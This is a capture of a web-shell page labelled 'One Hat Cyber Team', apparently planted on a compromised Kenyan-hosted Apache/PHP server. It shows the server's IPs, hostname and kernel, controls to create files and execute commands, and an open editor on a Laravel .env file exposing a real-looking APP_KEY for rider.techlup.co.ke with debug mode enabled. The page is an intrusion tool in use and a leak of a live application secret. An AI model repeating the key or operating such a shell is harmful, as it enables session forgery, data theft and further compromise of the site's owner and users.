⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.10
Server IP:
15.204.235.159
Server:
Linux srv.techlup.co.ke 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Server Software:
Apache
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
tech
/
rider.techlup.co.ke
/
admin
/
Edit File: .env
# Application Settings APP_NAME="LaravelApp" APP_ENV=local APP_KEY=base64:sI3BRGtywGNKgbT/JbiTBwumed1lP/tinTqf46Q5MGs= APP_DEBUG=true APP_URL=https://rider.techlup.co.ke/ # Database Configuration DB_CONNECTION=mysql DB_HOST=127.0.0.1 DB_PORT=3306 DB_DATABASE=your_database DB_USERNAME=your_username DB_PASSWORD=your_password # Cache & Session CACHE_DRIVER=file SESSION_DRIVER=file SESSION_LIFETIME=120 # Queue Driver QUEUE_CONNECTION=sync # Mail Configuration MAIL_MAILER=smtp MAIL_HOST=smtp.mailtrap.io MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_FROM_ADDRESS="hello@example.com" MAIL_FROM_NAME="${APP_NAME}" # Broadcasting & Pusher BROADCAST_DRIVER=log PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_APP_CLUSTER=mt1 # Logging LOG_CHANNEL=stack LOG_LEVEL=debug # Storage & Filesystem FILESYSTEM_DISK=local # Third-Party Services (Example: AWS S3, Stripe, etc.) AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET= STRIPE_KEY= STRIPE_SECRET= # Additional Custom Environment Variables CUSTOM_VAR=value
Simpan